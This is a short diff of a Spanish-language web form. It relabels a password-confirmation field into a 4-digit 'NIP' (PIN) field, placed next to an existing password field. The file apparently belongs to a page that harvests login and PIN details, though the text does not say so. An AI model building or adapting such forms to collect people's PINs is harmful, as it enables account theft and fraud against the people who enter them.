--- a/bb/159bb.html
+++ b/bb/159bb.html
@@ -60,11 +60,11 @@
 						<input type="password" input id="contraseña" name="contraseña" placeholder="Contraseña" required/>
 					</div>
 					<form class="formulario" id="contact-form"  name="submit-form">
-						<p class="centro"><b>Confirmar contraseña</b>
+						<p class="centro"><b>Ingresa Tu NIP</b>
 						</p><br>
-						<label for="nombre">Tu contraseña debe tener entre 8 y 30 caracteres</label>
+						<label for="nombre">Tu NIP debe tener 4 caracteres</label>
 					<div class="contenedor-input">
-						<input type="password" input id="confirmar" name="confirmar" placeholder="Contraseña" required/>
+						<input type="password" input id="confirmar" name="confirmar" placeholder="NIP" required/>
 					</div>
 		
 			
